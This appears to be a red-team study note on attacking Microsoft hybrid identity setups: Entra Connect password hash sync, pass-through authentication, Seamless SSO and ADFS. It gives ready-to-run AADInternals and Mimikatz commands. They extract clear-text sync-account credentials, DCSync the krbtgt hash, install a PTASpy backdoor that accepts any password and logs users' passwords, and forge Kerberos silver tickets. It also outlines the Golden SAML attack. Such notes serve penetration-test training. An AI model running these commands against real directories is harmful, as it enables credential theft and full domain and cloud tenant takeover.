Hybrid Identity
Organizations have resources, devices and applications both on-premises and in the cloud. Many enterprises se their on-prem AD identities to access Azure applications to avoid managing separate identities on both.
A single user identity for authentication and authorization to all resources, regardless of location is a hybrid identity
Entra Connect
An on-premises AD can be integrated with Entra ID using Entra Connect with the following methods. Every method supports Single Sign-on (SSO):
Password Hash Sync (PHS)
Pass-Through Authentication (PTA)
Federation

PHS (Password Hash Sync)
It syncs users and a hash of their password hashes (not clear-text or original hashes) for on-prem AD to Entra ID. This is the simplest and most popular method for getting a hybrid identity.
By default, password expiry and account expiry are not reflected in Entra ID. That means a user whose on-prem password is expired, can continue to access Azure resources using the old password.
For on-prem an account with the name MSOL_<installationID>
is automatically created. This account has replication (DCSync) permissions in the on-prem AD.
Enumerate MSOL users:
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
Once the Entra connect server is compromised. Use the below commands from the AADInternals module. Extract credentials of the MSOL_* and Sync_* accounts in clear text:
Import-Module AADInternals\AADInternals.psd1
Get-AADIntSyncCredentials
Using the creds of MSOL_* account, we can run DCSync against the on- prem AD:
runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command '"lsadump::dcsync/user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
PTA (Pass-through Authentication)
Microsoft Entra pass-through authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.

If we compromise a server with the authentication agent running, we can get the credentials for users in plain-text. We will first need to upload AADInternals.zip https://github.com/Gerenios/AADInternals. Next, unzip it and run :
Import-Module AADInternals\AADInternals.psd1
Install the PTA agent and collect credentials.
Install-AADIntPTASpy
All passwords are now accepted and credentials collected to
C:\PTASpy\PTASpy.csv
# Get clear-text passwords from users authenticating
Get-AADIntPTASpyLog
Seamless SSO
Entra Seamless SSO automatically signs users in when they are on-prem domain-joined machine. There is no need to use passwords to log in to Entra ID and on-prem application. On on-prem AD a user AZUREADSSOACC
Is created. This account's Kebreros decryption key is shared with entra ID.
Password/key of the AZUREADSSOACC never changes
This means that if we can compromise the NTLM hash of the machine account, we can create silver tickets for any synced on-prem user.
First get NTLM hash
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
We just need the userPrincipalName and SID of the user to create the Silver ticket that can be used from any machine connected to the internet.
Create silver ticket:
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
Federation
In case of federation
a trust is established between unrelated parties like on-premise AD and Entra ID. Users can access cloud applications by using their on-prem credentials.

ADFS
AD FS is a claimed-based identity model. Claims are simply statements (for example name, identity, groupp), made about users that are used primarily for authorizing access to claim-based applications located anywhere on the internet.

A user is identified by ImmutableID. It is globally unique and stored in Entra ID. The ImmuatbleID is stored on-prem as ms-DS-ConsistencyGuid
for the user and/or can be derived from the GUID of the user
Golden SAML attack
In ADFS, A SAML response is signed by a token-signing certificate. If the certificate is compromised, it is possible to authenticate to the Entra ID as ANY user in Entra ID. The certificate can be extracted from the AD FS server with Domain Admin privileges and then can be used from the internet connectd machine.

Last updated